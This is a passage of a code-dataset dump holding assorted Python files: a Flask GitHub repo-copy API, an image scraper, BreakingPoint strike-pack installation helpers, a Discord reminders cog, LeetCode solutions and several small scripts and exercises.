'C:/Users/larun/Desktop/Data Science Core/Projects/Urology/Image-analysis/triad/training-dir/'\r\n#opt.test_dir = 'C:/Users/larun/Desktop/Data Science Core/Projects/Urology/Image-analysis/triad/test-dir/'\r\n## \r\n#pickle_files = get_pickle_files(opt.in_dir)\r\n## \r\n#train_test_split = train_test_assg(len(pickle_files))\r\n# \r\n# i = 0 \r\n# for file in pickle_files:\r\n# train_vs_test = train_test_split[i] \r\n# us_seq = load_us_seq(file,opt)\r\n# training_df = get_training_samples(us_seq) \r\n# if train_vs_test == \"train\":\r\n# out_file = os.path.join(opt.train_dir,get_out_file_name(file,group = \"train\"))\r\n# os.makedirs(os.path.dirname(out_file), exist_ok=True)\r\n# training_df.to_pickle(out_file)\r\n# elif train_vs_test == \"test\":\r\n# out_file = os.path.join(opt.test_dir,get_out_file_name(file,group = \"test\"))\r\n# os.makedirs(os.path.dirname(out_file), exist_ok=True)\r\n# training_df.to_pickle(out_file)\r\n# i=i+1\r\n# \r\n# =============================================================================\r\n","sub_path":"1.Models/triad_model/data-prep/preparing-data-for-triad-model.py","file_name":"preparing-data-for-triad-model.py","file_ext":"py","file_size_in_byte":8695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"62278119","text":"'''\n\nExercício Python 052:\nFaça um programa que lê um número inteiro e se tiver 2 e apenas 2 divisores, mostra\nque é primo, senão, mostra que não é primo.\n\n'''\n\ncont = 1\ndiv = 0\nInput = int(input('Fale um número: '))\nwhile True:\n if Input % cont == 0:\n div += 1\n cont += 1\n if cont > Input or div > 2:\n break\n\nif div == 2:\n print('O número é primo')\nelse:\n print('O número não é primo')\n","sub_path":"refazendo/ex052 - ok.py","file_name":"ex052 - ok.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"14988828","text":"#django \nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nclass Administradores(models.Model):\n usuario=models.OneToOneField(User,on_delete=models.CASCADE)\n telefono=models.CharField(max_length=20, blank=True)\n fotoPerfil=models.ImageField(upload_to='usuarios/fotoPerfiles',blank=True,null=True)\n creacion=models.DateTimeField(auto_now_add=True)\n modificacion=models.DateTimeField(auto_now=True)\n\ndef __str__(self):\n return self.usuario.username\n","sub_path":"usuarios/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"413304551","text":"import os\nimport shutil\nimport datetime\nimport argparse\nimport sys\nsys.path.insert(0, '.')\n\nfrom scraper import image as image_scraper\nfrom scripts import build_metadata\n\ndef remove_folders(folders):\n print('=========================================')\n for folder in folders:\n print('Removing folder: {}'.format(folder))\n if os.path.exists(folder):\n shutil.rmtree(folder)\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Download images given topics and URL sources.')\n\n parser.add_argument(\"--keywords\", help='keywords file path', required=True)\n parser.add_argument(\"--sources\", help='urls file path', required=True)\n\n parser.add_argument(\"--image_directory\", help='downloads/ subfolder', default='')\n parser.add_argument(\"--n_images\", help='number of images per topic per source', default=15)\n 
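# (editor note) n_images arrives as a string when passed on the CLI, since no\n    # type=int is set on the argument above; downstream code should cast it with\n    # int() before doing arithmetic -- only the default value is an int.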
parser.add_argument(\"--cleanup\", help='if remove download and logs folder', default='false')\n parser.add_argument(\"--metadata\", help='if save metadata file', default='false')\n\n args = parser.parse_args()\n\n # Remove output folders\n # downloads - images\n # logs - metadata\n\n if args.cleanup.lower() == 'true':\n remove_folders(['downloads', 'logs'])\n\n # Retrieve list of topics from config folder\n keyword_file_path = os.path.join(args.keywords)\n image_source_file_path = os.path.join(args.sources)\n n_images = args.n_images\n image_directory = args.image_directory\n\n with open(keyword_file_path, 'r') as infile:\n keywords = infile.readlines()\n\n with open(image_source_file_path, 'r') as infile:\n image_sources = infile.readlines()\n\n keywords = image_scraper.clean_keyword(keywords)\n image_sources = image_scraper.clean_source(image_sources)\n\n start_time = datetime.datetime.now()\n\n image_scraper.scrape(keywords=keywords,\n sources=image_sources,\n n_images=n_images,\n image_directory=image_directory)\n\n end_time = datetime.datetime.now()\n elapsedTime = end_time - start_time\n\n print()\n print()\n print('Number of minutes and seconds elapsed: {}'.format(divmod(elapsedTime.total_seconds(), 60)))\n print()\n print()\n\n if args.metadata.lower() == 'true':\n print('Saving metadata file to folder: {}'.format(image_directory))\n build_metadata.build_metadata(logs_folder='logs', output_folder=image_directory)\n","sub_path":"scripts/scrape_images.py","file_name":"scrape_images.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"68796854","text":"from flask import Blueprint\nfrom flask_restful import Api, Resource, abort, reqparse, request\nfrom server import app, logger\nfrom flask.json import jsonify\nimport json\nimport requests\nfrom github import Github, GithubException\n\nfrom server.utils.utils import getAllFilesWPathsInDirectory\n\nDEFAULT_DIRS_TO_AVOID = set(['./.git', './env', './node_modules', './server/static/javascript', './.profile.d', './.heroku'])\nDEFAULT_EXTENSIONS_TO_AVOID = set(['pyc', 'log', 'python_history'])\n\ngithub_api = Api(Blueprint('github_api', __name__))\n\n@github_api.resource('/authenticate')\nclass Fetch_Github_Auth_Token(Resource):\n\n def post(self):\n\n token_url = 'https://github.com/login/oauth/access_token'\n\n data = {\n 'client_id': app.config.get('GITHUB_CLIENT_ID'),\n 'client_secret': app.config.get('GITHUB_CLIENT_SECRET'),\n 'code': self.code,\n }\n headers = {\n 'Accept': 'application/json'\n }\n\n resp = requests.post(token_url, data=data, headers=headers)\n\n return resp.json()\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('code', type=str, required=True, location='args')\n\n self.args = self.reqparse.parse_args()\n self.code = self.args.get('code')\n\n super(Fetch_Github_Auth_Token, self).__init__()\n\n\n@github_api.resource('/copy-app-to-repo')\nclass Copy_App_To_New_Repo(Resource):\n\n def post(self):\n\n repo_name = self.repo_name\n\n g = Github(self.token)\n\n # Since creating a repo happens on the user obejct, we must fetch the user first.\n user = g.get_user()\n user_login = user.login\n\n # Try to create the repo. 
Creation will fail if a repo has already been created with that name.\n        try:\n            logger.debug('Trying to create new repo with name: {}'.format(repo_name))\n            repo = user.create_repo(repo_name)\n            new_repo_name = repo.name\n        # If we fail to create a repo, we check to see if it was because there was already one with that name\n        except GithubException as repo_creation_error:\n            data = {\n                'repoName': repo_name,\n            }\n            return handleGithubError(repo_creation_error, data=data)\n\n        # If we successfully created the repo, then we can prep all files in this app to add to the repo.\n        files = getAllFilesWPathsInDirectory('.', dirsToAvoid=DEFAULT_DIRS_TO_AVOID, extensionsToAvoid=DEFAULT_EXTENSIONS_TO_AVOID)\n        files_added_successfully = []\n        files_failed = []\n\n        for i, file_path in enumerate(files):\n\n            # Format the path first so the error handler below can safely reference it.\n            file_path_formatted = file_path[2:]\n\n            # Try to read the file's content.\n            try:\n                with open(file_path, 'rb') as file:\n                    file_content = file.read()\n            except IOError:\n                files_failed.append(file_path_formatted)\n                continue\n\n            commit_message = 'Committing file {file_num} of {num_files} for {user_login} to {repo_name}: {file_path}'.format(file_num=i+1, num_files=len(files), user_login=user_login, repo_name=new_repo_name, file_path=file_path_formatted)\n\n            logger.debug(commit_message)\n\n            try:\n                # Ideally Github would allow us to add our files in batches, rather than one at a time,\n                # so that we can reduce the number of API calls required. However, based on this\n                # discussion, it does not appear to be possible. https://github.com/isaacs/github/issues/199\n\n                repo.create_file(file_path_formatted, commit_message, file_content)\n                files_added_successfully.append(file_path_formatted)\n            except GithubException:\n                files_failed.append(file_path_formatted)\n\n        results = {\n            'repoName': new_repo_name,\n            'successfullyAdded': files_added_successfully,\n            'failed': files_failed,\n        }\n\n        return results\n\n\n    def __init__(self):\n        self.reqparse = reqparse.RequestParser()\n        self.reqparse.add_argument('token', required=True, location='json')\n        self.reqparse.add_argument('repoName', required=True, location='json')\n\n        self.args = self.reqparse.parse_args()\n        self.token = self.args.get('token')\n        self.repo_name = self.args.get('repoName')\n\n        super(Copy_App_To_New_Repo, self).__init__()\n\n\n\ndef handleGithubError(error, data={}):\n    status = error.args[0]\n    errorData = error.args[1]\n\n    resp = {\n        'data': data,\n        'error': errorData,\n    }\n\n    logger.debug('Received GitHub Error with Status {status}. 
Error: {errorData}'.format(status=status, errorData=errorData))\n return resp, status\n","sub_path":"server/api/githubApi.py","file_name":"githubApi.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"147552393","text":"# Runtime 156 ms\n# Beats 69%\nclass Solution:\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n if num1 == '0' or num2 == '0':\n return '0'\n \n rst = [0] * (len(num1) + len(num2))\n for i, m in enumerate(num1[::-1]):\n for j, n in enumerate(num2[::-1]):\n rst[i+j] += (int(m) * int(n))\n\n # 注意进位处理\n for i in range(len(rst)):\n if rst[i] >= 10:\n rst[i+1] += rst[i] // 10\n rst[i] %= 10\n \n # m 位数字 x n 位数字,结果 m + n 位,但是首位有可能是 0\n return ''.join(map(str, rst))[::-1] if rst[-1] else ''.join(map(str, rst[:-1]))[::-1]\n","sub_path":"43-Multiply-Strings/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"185229394","text":"\"\"\"\n===================\nCompare PAC methods\n===================\n\nCompute PAC on multiple datasets and compare implemented methods.\n\"\"\"\nfrom __future__ import print_function\nimport matplotlib.pyplot as plt\nfrom tensorpac.utils import pac_signals_tort\nfrom tensorpac import Pac\nplt.style.use('seaborn-paper')\n\n# First, we generate a dataset of signals artificially coupled between 10hz\n# and 100hz. By default, this dataset is organized as (ntrials, npts) where\n# npts is the number of time points.\nn = 10 # number of datasets\nsf = 256. # sampling frequency\nnpts = 3000 # Number of time points\ndata, time = pac_signals_tort(sf=sf, fpha=[4, 6], famp=[90, 110], noise=3,\n ntrials=n, dpha=10, damp=10, npts=npts)\n\n# First, let's use the MVL, without any further correction by surrogates :\np = Pac(fpha=(1, 10, 1, .1), famp=(60, 140, 1, 1), dcomplex='wavelet',\n width=6)\n\n# Now, we want to compare PAC methods, hence it's useless to systematically\n# filter the data. 
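(editor note: the band-pass filtering, not the PAC fit itself, is the costly step.)\n# 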
So we extract the phase and the amplitude only once :\nphases = p.filter(sf, data, axis=1, ftype='phase')\namplitudes = p.filter(sf, data, axis=1, ftype='amplitude')\n\nplt.figure(figsize=(18, 9))\nfor i, k in enumerate([1, 2, 3, 4, 5]):\n # Change the pac method :\n p.idpac = (k, 0, 0)\n print('-> PAC using ' + str(p))\n # Compute only the PAC without filtering :\n xpac = p.fit(phases, amplitudes, axis=2)\n # Plot :\n plt.subplot(2, 3, k)\n p.comodulogram(xpac.mean(-1), title=p.method, cmap='Spectral_r')\n\nplt.show()\n","sub_path":"examples/plot_pac_methods.py","file_name":"plot_pac_methods.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"34960925","text":"from sklearn import tree\nfrom classifiers.classifier import Classifier\n\ncriterion = {0: \"gini\", 1: \"entropy\"}\n\n\nclass DecisionTree(Classifier):\n\n chosen_criterion = criterion[0]\n max_depth = None\n max_leaf_nodes = None\n\n name = \"Decision trees algorithm\"\n\n def __init__(self, data, lr, labels, training_fraction, arguments):\n super().__init__(data, lr, labels, training_fraction, arguments)\n\n try:\n self.chosen_criterion = criterion[arguments[0]]\n self.max_depth = int(arguments[1])\n self.max_leaf_nodes = int(arguments[2])\n self.model = tree.DecisionTreeClassifier(criterion=self.chosen_criterion,\n max_depth=self.max_depth,\n max_leaf_nodes=self.max_leaf_nodes)\n except:\n self.model = tree.DecisionTreeClassifier()\n\n def print_stats(self, dataset_name, basic=True):\n print(f\"Criterion:\\t\\t\\t{self.chosen_criterion}\")\n print(f\"Max depth:\\t\\t\\t{self.max_depth}\")\n print(f\"Max leaf nodes:\\t\\t\\t{self.max_leaf_nodes}\")\n print(self.get_metrics())\n","sub_path":"Zadanie1/classifiers/decisionTree.py","file_name":"decisionTree.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"163379899","text":"# -*- coding: utf-8 -*-\nfrom gevent import monkey\nmonkey.patch_all()\nimport random, datetime\nimport gevent\nfrom gevent.queue import Queue\nfrom pymongo import MongoClient\n\n\n\ndef get_collection(collection_key):\n global gClientMongo\n ret = None\n collection = None\n client, db = None, None\n host, port = 'localhost', 27017\n client = MongoClient(host, port)\n db = client['sensor_log']\n if not collection_key in db.collection_names(False):\n ret = db.create_collection(collection_key)\n else:\n ret = db[collection_key]\n return ret\n\ndef build_queue():\n queue = Queue(maxsize=10000)\n for i in range(queue.maxsize):\n o = {}\n o['device_id'] = 'aaaaaaaaaaaaa'\n o['sensor_id'] = 'AHRS_MPU6050'\n o['timestamp'] = datetime.datetime.now()\n o['value'] = {'temperature':'%.2f' % random.triangular(24.0, 27.0)}\n queue.put(o)\n return queue\n\n\ndef test():\n device_id = 'AHRS'\n today = datetime.datetime.now().strftime(\"%Y%m%d\")\n collection_name = 'sensor_log_%s_%s' % (device_id, today)\n collection = get_collection(collection_name)\n q = build_queue()\n print ('before qsize=%d' % q.qsize())\n # collection.insert_many(q.queue)\n q.queue.clear()\n print ('after qsize=%d' % q.qsize())\n\n\n\ndef main():\n i = 0.0\n while True:\n print(i)\n i += 1.0\n gevent.sleep(1.0)\n\nif __name__ == '__main__':\n m = gevent.spawn(main)\n t = gevent.spawn_later(3, test)\n gevent.joinall([m, 
t])\n\n\n","sub_path":"test/test_mongo.py","file_name":"test_mongo.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"327924477","text":"import tkinter as tk\n\nwindow = tk.Tk()\n\n# sets the window size to 500px x 300px\nwindow.geometry(\"500x300\")\nwindow.title('Window Title')\n\npython = tk.BooleanVar()\ncplusplus = tk.BooleanVar()\n# create a new checkbutton\npython_checkbox = tk.Checkbutton(text=\"Python\", variable=python)\ncplusplus_checkbox = tk.Checkbutton(text=\"C++\", variable=cplusplus)\n\nlabel = tk.Label(text=\"Hello World\",\n width=10, # width of 10 'o'\n height=10, # height of 10 'o'\n foreground=\"white\", # text color\n background=\"black\") # background color\n\nlabel.text = f''\n\npython_checkbox.pack()\ncplusplus_checkbox.pack()\nlabel.pack()\n\nwindow.mainloop()\n","sub_path":"checkbutton.py","file_name":"checkbutton.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"56507758","text":"#/usr/bin/env python3\n\n'''\nUpdate the how-to-bingewatch-class-who-skipwatch.md script and then\nrun pandoc to create all of the index-...html files.\n\nUsage:\n python3 update.py\n'''\n\nimport io\nimport json\nimport sys\nfrom pprint import pprint\nimport Levenshtein # py -3 -m pip install --user \"python-Levenshtein\"\n\nMD = \"how-to-bingewatch-class-who-skipwatch.md\"\nJS = json.load(open(\"doctor-who-classic-list.json\", \"r\"))\n\ndef check_in_andys_list(line, andysWatches):\n for aw in andysWatches:\n found = line.find(aw)\n if found >=0:\n return True\n return False\n\ndef ClosestMatch(episode, JS):\n ix = episode.find(\"(\")\n if ix>=0: episode = episode[0:ix]\n total = [(x[\"Title\"], x) for x in JS]\n total = [(Levenshtein.distance(episode, x), y) for x, y in total]\n total = sorted(total, key=lambda x: x[0])\n x = total[0][1]\n #if total[0][0] > 1: print(episode, total[0])\n return \"Story {}; {} episodes - {}\".format(x[\"Story\"], x[\"Episodes\"], x[\"Title\"])\n\ndef main():\n from update import ANDYS_WATCHES \n\n with open(MD + \".base\", \"rb\") as f:\n #lines = f.read().decode('cp1252', errors='backslashreplace').splitlines()\n lines = f.read().decode('utf-8').splitlines()\n\n def EndLast(last_info, fw):\n if last_info==None:\n return None\n print(last_info, file=fw)\n print('', file=fw)\n return None\n\n last_info = None\n\n with io.open(MD, \"w\", encoding='utf-8', newline='\\n') as fw:\n season = \"???\"\n for line in lines:\n if line.startswith(\"# Season\"):\n last_info = EndLast(last_info, fw)\n season = \"\" + line[2:].strip() + \"\"\n print(line, file=fw)\n print(line.replace(\"# \", \"\\n## Summary - \"), file=fw)\n continue\n # ...\n if line.startswith(\"## \"):\n last_info = EndLast(last_info, fw)\n line_stripped = line[3:]\n line_stripped = line_stripped \\\n .replace(\" - Maybe\", \"\") \\\n .replace(\" - Watch\", \"\") \\\n .replace(\" - Essential\", \"\") \\\n .replace(\" - Skip\", \"\")\n if check_in_andys_list(line, ANDYS_WATCHES):\n line += \" - AW\"\n last_info = ClosestMatch(line_stripped, JS)\n print(line, file=fw)\n print('', file=fw)\n print(season, file=fw)\n continue\n # ...\n print(line, file=fw)\n # ...\n last_info = EndLast(last_info, fw)\n\nif __name__=='__main__':\n main()\n import pandocize\n pandocize.main(sys.argv[0:1] + [\"all\"])\n\nANDYS_WATCHES = (\n \"The War 
Games\",\n)","sub_path":"doctor-who-list/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"647296435","text":"fruits = [\"apples\", \"pears\", \"oranges\", \"peaches\"]\ndef fruit_loops(x):\n b = 0\n b2 = 0\n for i in x:\n c = (((str(b + 1) + \".\") + x[b]))\n print(c[::-1])\n b += 1\n x.pop()\n for i in x:\n print(((str(b2 + 1) + \".\") + x[b2]))\n b2 += 1\n\nfruit_loops(fruits)","sub_path":"students/Tommy Aguilu/list_lab_04.py","file_name":"list_lab_04.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"213578427","text":"\nclass Solution(object):\n def findLength(self, A, B):\n \"\"\"\n :type A: List[int]\n :type B: List[int]\n :rtype: int\n \"\"\"\n m, n = len(A), len(B)\n d = [[0] * m for _ in range(n)]\n maxlen = 0\n for i in range(m):\n for j in range(n):\n if A[i] == B[j]:\n if i == 0 or j == 0:\n d[i][j] = 1\n else:\n d[i][j] = d[i-1][j-1] + 1\n maxlen = max(maxlen, d[i][j])\n return maxlen\n\n\nif __name__ == '__main__':\n s = Solution()\n tests = [\n (\n [1,2,3,2,1],\n [3,2,1,4,7]\n )\n ]\n for a, b in tests:\n print(s.findLength(a, b))","sub_path":"718_maximum_length_of_repeated_subarray.py","file_name":"718_maximum_length_of_repeated_subarray.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"273963359","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport re\n\nfrom bp_controller.command_templates import install_strikes\nfrom cloudshell.cli.command_template.command_template_executor import CommandTemplateExecutor\n\n\nclass InstallStrikePackActions(object):\n TIMEOUT = 600\n\n def __init__(self, cli_service, logger):\n \"\"\" Strike pack installation actions\n\n :param cli_service: default mode cli_service\n \"\"\"\n\n self._cli_service = cli_service\n self._logger = logger\n\n def get_strike_pack_version(self, conn_name=\"bps\"):\n \"\"\" Get current installed strike pack version \"\"\"\n\n output = CommandTemplateExecutor(self._cli_service,\n install_strikes.GET_STRIKE_PACK_VERSION,\n timeout=self.TIMEOUT).execute_command(conn_name=conn_name)\n\n match = re.search(r\"(?P\\d+)\", output, re.DOTALL)\n\n if not match:\n raise Exception(self.__class__.__name__, \"Strike Pack version determination failed: {}\".format(output))\n\n return match.groupdict().get(\"version\")\n\n def reinit_connection(self, conn_name=\"quali\"):\n \"\"\" Re-initialize BPS Connection installed strike pack version \"\"\"\n\n command = install_strikes.REINIT_CONNECTION.format(conn_name=conn_name,\n login=self._cli_service.session.username,\n password=self._cli_service.session.password)\n\n self._logger.debug(\"Re-init session: {}\".format(command))\n\n output = self._cli_service.send_command(command, timeout=self.TIMEOUT)\n\n self._logger.debug(\"Re-init session finished: {}\".format(output))\n\n # output = CommandTemplateExecutor(self._cli_service,\n # install_strikes.REINIT_CONNECTION).execute_command(conn_name=conn_name,\n # login=self._cli_service.session.username,\n # password=self._cli_service.session.password)\n\n if not re.search(r\"bPSConnection\\d+\", output):\n raise Exception(self.__class__.__name__, \"Re-initialize BPS connection failed: {}\".format(output))\n\n return conn_name\n\n def install_strike_pack(self, strike_pack_url, conn_name=\"bps\"):\n \"\"\" 
Install strike pack \"\"\"\n\n self._logger.debug(\"Install strike pack: URL - {}, CONN - {}\".format(strike_pack_url, conn_name))\n\n output = CommandTemplateExecutor(self._cli_service,\n install_strikes.INSTALL_STRIKE_PACK,\n timeout=self.TIMEOUT).execute_command(conn_name=conn_name,\n strike_pack_url=strike_pack_url)\n\n self._logger.debug(\"Install strike pack finished: {}\".format(output))\n\n # if not re.search(r\"iluAddLicenseServers ended\", output):\n # raise Exception(self.__class__.__name__, \"Add License Server failed with error: {}\".format(output))\n\n def reload_device(self, timeout=600, conn_name=\"bps\"):\n \"\"\" Reload device\n\n :param timeout: session reconnect timeout\n :param conn_name: BPS connection name\n :param action_map: actions will be taken during executing commands, i.e. handles yes/no prompts\n :param error_map: errors will be raised during executing commands, i.e. handles Invalid Commands errors\n \"\"\"\n\n self._logger.debug(\"Start reload device\")\n try:\n output = CommandTemplateExecutor(self._cli_service,\n install_strikes.REBOOT,\n timeout=self.TIMEOUT).execute_command(conn_name=conn_name)\n\n self._logger.debug(\"Reboot output: {}\".format(output))\n except Exception as e:\n self._logger.debug(\"Connection closed: {}\".format(e))\n pass\n\n self._logger.debug(\"Waiting for session reconnect\")\n self._cli_service.reconnect(timeout)\n","sub_path":"src/bp_controller/actions/install_strike_pack_actions.py","file_name":"install_strike_pack_actions.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"90256247","text":"\"\"\"\nReminders cog. Database backed to ensure persistence between bot restarts.\n\"\"\"\nimport asyncio\nimport datetime\nimport logging\n\nimport discord\nfrom discord.ext import commands\n\nfrom joku.cogs._common import Cog\nfrom joku.core.bot import Context\nfrom joku.core.utils import parse_time\nfrom joku.db.tables import Reminder\n\nlogger = logging.getLogger(\"Jokusoramame.Reminders\")\n\n\nclass Reminders(Cog):\n _is_running_reminders = asyncio.Lock()\n\n _currently_running = {}\n\n async def _fire_reminder(self, reminder: Reminder):\n \"\"\"\n Fires a reminder object to be ran.\n \"\"\"\n # Wrap everything in a try/finally.\n try:\n if reminder.enabled is False:\n # race conditions?\n return\n\n # check to see if the reminder is valid or not\n channel = self.bot.get_channel(reminder.channel_id)\n if channel is None:\n # cancel it\n self.logger.warning(\"Reminder channel was empty - not reminding...\")\n await self.bot.database.cancel_reminder(reminder.id)\n return\n\n guild = channel.guild # type: discord.Guild\n member = guild.get_member(reminder.user_id)\n if not member:\n self.logger.warning(\"Reminder member was dead - not reminding...\")\n await self.bot.database.cancel_reminder(reminder.user_id)\n return\n\n self._currently_running[reminder.id] = True\n\n # lol local time\n time_left = reminder.reminding_at.timestamp() - datetime.datetime.utcnow().timestamp()\n # sleep for that many seconds before waking up and sending the messages.\n await asyncio.sleep(time_left)\n\n # send the reminder\n try:\n await channel.send(\":alarm_clock: {}, you wanted to be reminded of: `{}`\".format(member.mention,\n reminder.text))\n except discord.HTTPException:\n logger.warning(\"Failed to send reminder `{}`!\".format(reminder.id))\n finally:\n # todo: repeating reminders\n reminder.enabled = False\n\n # mark it as disabled\n if 
reminder.enabled is False:\n                # race conditions?\n                return\n\n            # check to see if the reminder is valid or not\n            channel = self.bot.get_channel(reminder.channel_id)\n            if channel is None:\n                # cancel it\n                self.logger.warning(\"Reminder channel was empty - not reminding...\")\n                await self.bot.database.cancel_reminder(reminder.id)\n                return\n\n            guild = channel.guild  # type: discord.Guild\n            member = guild.get_member(reminder.user_id)\n            if not member:\n                self.logger.warning(\"Reminder member was dead - not reminding...\")\n                # cancel by the reminder's own id, not the user id\n                await self.bot.database.cancel_reminder(reminder.id)\n                return\n\n            self._currently_running[reminder.id] = True\n\n            # lol local time\n            time_left = reminder.reminding_at.timestamp() - datetime.datetime.utcnow().timestamp()\n            # sleep for that many seconds before waking up and sending the messages.\n            await asyncio.sleep(time_left)\n\n            # send the reminder\n            try:\n                await channel.send(\":alarm_clock: {}, you wanted to be reminded of: `{}`\".format(member.mention,\n                                                                                                 reminder.text))\n            except discord.HTTPException:\n                logger.warning(\"Failed to send reminder `{}`!\".format(reminder.id))\n            finally:\n                # todo: repeating reminders\n                reminder.enabled = False\n\n                # mark it as disabled\n                if reminder.enabled is False:\n                    await self.bot.database.cancel_reminder(reminder.id)\n\n        finally:\n            self._currently_running.pop(reminder.id, None)\n\n    async def ready(self):\n        if self._is_running_reminders.locked():\n            return\n\n        async with self._is_running_reminders:\n            while True:\n                # Scan the reminders firing in the next 300 seconds.\n                reminders = await self.bot.database.scan_reminders(within=300)\n                for reminder in reminders:\n                    self.bot.loop.create_task(self._fire_reminder(reminder))\n\n                # Sleep for 300 seconds afterwards.\n                await asyncio.sleep(300)\n\n    @commands.command()\n    async def remind(self, ctx: Context, tstr: str, *, content: str):\n        \"\"\"\n        Sets a reminder to be run in the future.\n        \"\"\"\n        _ = parse_time(tstr, seconds=False)\n        if _ is None:\n            await ctx.send(\":x: Invalid time string.\")\n            return\n\n        dt, seconds = _\n\n        content = content.replace(\"`\", \"´\").replace(\"@everyone\", \"@\u200beveryone\").replace(\"@here\", \"@\u200bhere\")\n\n        reminder = await ctx.bot.database.create_reminder(ctx.channel, ctx.author, content,\n                                                          remind_at=dt)\n        if seconds < 300:\n            # make the reminder immediately.\n            t = self.bot.loop.create_task(self._fire_reminder(reminder))\n        else:\n            t = asyncio.sleep(0)\n\n        em = discord.Embed(title=\"Remembering things so you don't have to\")\n        em.description = content\n        em.set_footer(text=\"Reminding at: \")\n        em.timestamp = dt\n\n        await ctx.send(embed=em)\n        await t\n\n\nsetup = Reminders.setup\n","sub_path":"joku/cogs/games/reminders.py","file_name":"reminders.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"237124034","text":"\"\"\"\n26. Remove Duplicates from Sorted Array\n\nGiven an integer array nums sorted in non-decreasing order, remove the duplicates in-place such that each unique element appears only once. The relative order of the elements should be kept the same.\n\nSince it is impossible to change the length of the array in some languages, you must instead have the result be placed in the first part of the array nums. More formally, if there are k elements after removing the duplicates, then the first k elements of nums should hold the final result. It does not matter what you leave beyond the first k elements.\n\nReturn k after placing the final result in the first k slots of nums.\n\nDo not allocate extra space for another array. 
You must do this by modifying the input array in-place with O(1) extra memory.\n\nExample 1:\n\nInput: nums = [1,1,2]\nOutput: 2, nums = [1,2,_]\nExplanation: Your function should return k = 2, with the first two elements of nums being 1 and 2 respectively.\nIt does not matter what you leave beyond the returned k (hence they are underscores).\nExample 2:\n\nInput: nums = [0,0,1,1,1,2,2,3,3,4]\nOutput: 5, nums = [0,1,2,3,4,_,_,_,_,_]\nExplanation: Your function should return k = 5, with the first five elements of nums being 0, 1, 2, 3, and 4 respectively.\nIt does not matter what you leave beyond the returned k (hence they are underscores).\n\"\"\"\n\nfrom typing import List\n\n# O(n^2) approach: repeatedly pop the duplicate that follows the current index.\nclass Solution:\n    def removeDuplicates(self, nums: List[int]) -> int:\n        index = 0\n\n        while index < len(nums):\n            if index + 1 < len(nums):\n                if nums[index] == nums[index + 1]:\n                    nums.pop(index + 1)\n                else:\n                    index += 1\n            else:\n                break\n\n        return index + 1\n\n# O(n) two-pointer approach; this definition shadows the one above and is the\n# version exercised below.\nclass Solution:\n    def removeDuplicates(self, nums: List[int]) -> int:\n        duplicates = 0\n\n        for i in range(1, len(nums)):\n            if nums[i] == nums[i - 1]:\n                duplicates += 1\n            else:\n                nums[i - duplicates] = nums[i]\n\n        return len(nums) - duplicates\n\nprint(Solution().removeDuplicates([0,0,1,1,1,2,2,3,3,4]))","sub_path":"26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"607662876","text":"# Given an array of integers greater than zero, find if it is possible to split it in two subarrays (without reordering the elements), such that the sum of the two subarrays is the same. Print the two subarrays.\n\ndef equal_sum1(arr):\n\tleft_sum = 0\n\n\tfor i in range(len(arr)):\n\t\tleft_sum += arr[i]\n\n\tright_sum = 0\n\tfor i in range(len(arr) - 1, -1, -1):\n\t\tright_sum += arr[i]\n\n\t\tleft_sum -= arr[i]\n\n\t\tif right_sum == left_sum:\n\t\t\treturn True\n\n\treturn False\n\n\ndef equal_sum(arr):\n\tleft_sum = 0\n\ths = {}\n\n\tfor i in range(len(arr)):\n\t\tleft_sum += arr[i]\n\t\tif left_sum not in hs:\n\t\t\ths[left_sum] = i\n\n\t# the total must be even and half of it must occur as a prefix sum\n\tif left_sum % 2 == 0 and (left_sum // 2) in hs:\n\t\treturn True\n\treturn False\n\nprint(equal_sum([4, 1, 2, 3]))\nprint(equal_sum([1, 2, 3, 4, 5, 5]))\nprint(equal_sum([4, 3, 2, 1]))\n","sub_path":"Facebook/EqualSumSubarrays.py","file_name":"EqualSumSubarrays.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
